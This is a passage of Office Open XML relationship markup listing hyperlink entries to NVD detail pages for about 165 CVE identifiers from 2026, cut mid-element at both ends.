Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18737" TargetMode="External" Id="rId3095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19051" TargetMode="External" Id="rId3096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19671" TargetMode="External" Id="rId3097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId3098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21104" TargetMode="External" Id="rId3099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23940" TargetMode="External" Id="rId3100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30865" TargetMode="External" Id="rId3101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35219" TargetMode="External" Id="rId3102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35445" TargetMode="External" Id="rId3103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38821" TargetMode="External" Id="rId3104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42142" TargetMode="External" Id="rId3105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45808" TargetMode="External" Id="rId3106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47682" TargetMode="External" Id="rId3107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47704" TargetMode="External" Id="rId3108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47735" TargetMode="External" Id="rId3109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47765" TargetMode="External" Id="rId3110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48099" TargetMode="External" Id="rId3111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48494" TargetMode="External" Id="rId3112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48495" TargetMode="External" Id="rId3113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49249" TargetMode="External" Id="rId3114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49253" TargetMode="External" Id="rId3115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49315" TargetMode="External" Id="rId3116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50165" TargetMode="External" Id="rId3117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52762" TargetMode="External" Id="rId3118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53532" TargetMode="External" Id="rId3119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53603" TargetMode="External" Id="rId3120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53604" TargetMode="External" Id="rId3121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53704" TargetMode="External" Id="rId3122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53728" TargetMode="External" Id="rId3123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53792" TargetMode="External" Id="rId3124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54085" TargetMode="External" Id="rId3125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54356" TargetMode="External" Id="rId3126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54491" TargetMode="External" Id="rId3127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54715" TargetMode="External" Id="rId3128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55066" TargetMode="External" Id="rId3129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55502" TargetMode="External" Id="rId3130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55520" TargetMode="External" Id="rId3131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55527" TargetMode="External" Id="rId3132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55537" TargetMode="External" Id="rId3133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55540" TargetMode="External" Id="rId3134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55609" TargetMode="External" Id="rId3135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55673" TargetMode="External" Id="rId3136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55694" TargetMode="External" Id="rId3137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56702" TargetMode="External" Id="rId3138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58262" TargetMode="External" Id="rId3139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59184" TargetMode="External" Id="rId3140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59186" TargetMode="External" Id="rId3141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59187" TargetMode="External" Id="rId3142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59189" TargetMode="External" Id="rId3143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59981" TargetMode="External" Id="rId3144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59982" TargetMode="External" Id="rId3145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62315" TargetMode="External" Id="rId3146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62680" TargetMode="External" Id="rId3147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63177" TargetMode="External" Id="rId3148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63652" TargetMode="External" Id="rId3149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64379" TargetMode="External" Id="rId3150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64816" TargetMode="External" Id="rId3151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64826" TargetMode="External" Id="rId3152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65934" TargetMode="External" Id="rId3153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65981" TargetMode="External" Id="rId3154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66003" TargetMode="External" Id="rId3155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66060" TargetMode="External" Id="rId3156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66061" TargetMode="External" Id="rId3157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId3158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67199" TargetMode="External" Id="rId3159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67329" TargetMode="External" Id="rId3160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67337" TargetMode="External" Id="rId3161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68513" TargetMode="External" Id="rId3162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68515" TargetMode="External" Id="rId3163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68553" TargetMode="External" Id="rId3164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId3165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId3166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId3167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId3168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69093" TargetMode="External" Id="rId3169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69244" TargetMode="External" Id="rId3170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69262" TargetMode="External" Id="rId3171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId3172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId3173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId3174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId3175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId3176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId3177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId3178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId3179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId3180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId3181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId3182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId3183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId3184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId3185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId3186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId3187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId3188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId3189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId3190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId3191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId3192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId3193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId3194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId3195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId3196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId3197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId3198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId3199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70462" TargetMode="External" Id="rId3200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70471" TargetMode="External" Id="rId3201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70472" TargetMode="External" Id="rId3202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70475" TargetMode="External" Id="rId3203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70485" TargetMode="External" Id="rId3204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71415" TargetMode="External" Id="rId3205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71505" TargetMode="External" Id="rId3206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71507" TargetMode="External" Id="rId3207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71508" TargetMode="External" Id="rId3208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71509" TargetMode="External" Id="rId3209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71510" TargetMode="External" Id="rId3210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71511" TargetMode="External" Id="rId3211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71553" TargetMode="External" Id="rId3212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71556" TargetMode="External" Id="rId3213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71964" TargetMode="External" Id="rId3214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72694" TargetMode="External" Id="rId3215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72731" TargetMode="External" Id="rId3216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72774" TargetMode="External" Id="rId3217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72838" TargetMode="External" Id="rId3218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72909" TargetMode="External" Id="rId3219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72910" TargetMode="External" Id="rId3220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73074" TargetMode="External" Id="rId3221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73215" TargetMode="External" Id="rId3222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73266" TargetMode="External" Id="rId3223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId3224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73331" TargetMode="External" Id="rId3225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74039" TargetMode="External" Id="rId3226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74237" TargetMode="External" Id="rId3227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74881" TargetMode="External" Id="rId3228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75002" TargetMode="External" Id="rId3229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75132" TargetMode="External" Id="rId3230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75369" TargetMode="External" Id="rId3231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75830" TargetMode="External" Id="rId3232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75846" TargetMode="External" Id="rId3233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76223" TargetMode="External" Id="rId3234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77125" TargetMode="External" Id="rId3235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77611" TargetMode="External" Id="rId3236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77847" TargetMode="External" Id="rId3237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77939" TargetMode="External" Id="rId3238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78083" TargetMode="External" Id="rId3239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78134" TargetMode="External" Id="rId3240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79617" TargetMode="External" Id="rId3241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79745" TargetMode="External" Id="rId3242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79747" TargetMode="External" Id="rId3243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79754" TargetMode="External" Id="rId3244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79775" TargetMode="External" Id="rId3245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80183" TargetMode="External" Id="rId3246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80380" TargetMode="External" Id="rId3247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81330" TargetMode="External" Id="rId3248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81404" TargetMode="External" Id="rId3249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId3250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81783" TargetMode="External" Id="rId3251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81795" TargetMode="External" Id="rId3252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId3253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId3254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId3255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId3256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId3257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId3258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId3259" /><Relationship 